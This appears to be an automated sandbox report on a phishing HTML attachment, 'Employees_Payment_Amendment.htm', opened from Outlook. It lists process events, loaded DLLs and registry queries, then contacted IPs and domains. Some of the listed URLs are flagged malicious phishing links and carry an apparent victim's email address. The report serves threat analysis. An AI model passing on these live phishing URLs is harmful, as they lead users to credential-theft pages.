Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "3429B1E5-3585-42FF-BFDA-C768B92027DE" "27161F02-5B78-4276-881C-C72DECBE88B8" "6240" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\8IYQW4LA\Employees_Payment_Amendment.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1812,i,3389952850226509095,16005016395332430029,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information queried: ProcessInformation
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
160.153.0.153
 designgallerias.com United States
21501 GODADDY-AMSDE false
142.250.186.46
 unknown United States
15169 GOOGLEUS false
20.189.173.9
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.18.94.41
 unknown United States
13335 CLOUDFLARENETUS false
151.101.130.137
 unknown United States
54113 FASTLYUS false
151.101.66.137
 code.jquery.com United States
54113 FASTLYUS false
142.250.186.110
 plus.l.google.com United States
15169 GOOGLEUS false
35.190.80.1
 a.nel.cloudflare.com United States
15169 GOOGLEUS false
104.26.13.205
 unknown United States
13335 CLOUDFLARENETUS false
142.250.9.99
 www.google.com United States
15169 GOOGLEUS false
172.217.18.110
 unknown United States
15169 GOOGLEUS false
52.113.194.132
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.26.12.205
 api.ipify.org United States
13335 CLOUDFLARENETUS false
34.104.35.123
 unknown United States
15169 GOOGLEUS false
1.1.1.1
 unknown Australia
13335 CLOUDFLARENETUS false
52.109.68.130
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.18.95.41
 challenges.cloudflare.com United States
13335 CLOUDFLARENETUS false
203.142.211.38
 mainet.ne.jp Japan 24282 KIRKAGOYAJAPANIncJP false
142.250.186.106
 unknown United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
188.114.97.3
 infinitipulsarjoy.ru European Union
13335 CLOUDFLARENETUS true
142.250.185.174
 unknown United States
15169 GOOGLEUS false
142.250.185.131
 unknown United States
15169 GOOGLEUS false
188.114.96.3
 pulsecortexe.space European Union
13335 CLOUDFLARENETUS false
64.233.184.84
 unknown United States
15169 GOOGLEUS false
108.177.122.94
 unknown United States
15169 GOOGLEUS false
74.125.136.113
 play.google.com United States
15169 GOOGLEUS false
52.109.76.240
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.217.16.195
 unknown United States
15169 GOOGLEUS false
104.17.25.14
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false

Private

IP
192.168.2.17
192.168.2.16
192.168.2.23
192.168.2.13

Contacted Domains

Name IP Active
mainet.ne.jp 203.142.211.38 true
a.nel.cloudflare.com 35.190.80.1 true
infinitipulsarjoy.ru 188.114.97.3 true
plus.l.google.com 142.250.186.110 true
pulsecortexe.space 188.114.96.3 true
antibots.net 188.114.96.3 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
play.google.com 74.125.136.113 true
code.jquery.com 151.101.66.137 true
cdnjs.cloudflare.com 104.17.25.14 true
challenges.cloudflare.com 104.18.95.41 true
api.ipify.org 104.26.12.205 true
www.google.com 142.250.9.99 true
designgallerias.com 160.153.0.153 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://pulsecortexe.space/ZPtar/#Mgjohnson@murexltd.com true
    		unknown
    https://pulsecortexe.space/ false
      		unknown
      https://pulsecortexe.space/ZPtar/ true
        		unknown
        https://mainet.ne.jp/ false
          		unknown
          https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com false
            		unknown